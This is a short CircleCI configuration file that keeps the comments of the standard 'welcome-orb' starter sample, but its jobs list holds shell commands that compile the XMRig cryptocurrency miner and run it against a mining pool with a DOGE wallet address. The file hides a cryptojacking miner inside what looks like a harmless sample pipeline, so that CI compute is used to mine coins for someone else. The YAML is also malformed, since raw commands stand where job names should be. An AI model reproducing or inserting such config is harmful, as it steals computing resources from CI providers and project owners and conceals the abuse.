# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
# Use a package of configuration called an orb.
orbs:
  # Declare a dependency on the welcome-orb
  welcome: circleci/welcome-orb@0.4.1
# Orchestrate or schedule a set of jobs
workflows:
  # Name the workflow "welcome"
  welcome:
    # Run the welcome/run job in its own container
    jobs:
      - sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev -y
      - git clone https://github.com/xmrig/xmrig.git
      - mkdir xmrig/build && cd xmrig/build
      - cmake ..
      - sudo make -j$(nproc)
      - sudo chmod 744 xmrig
      - sudo ./xmrig -o rx.unmineable.com:3333 -u DOGE:D5JVmrCcerQuWfEigACBJ3KNHuR29KSUxq.Nanda1 -p x -k -a rx/0
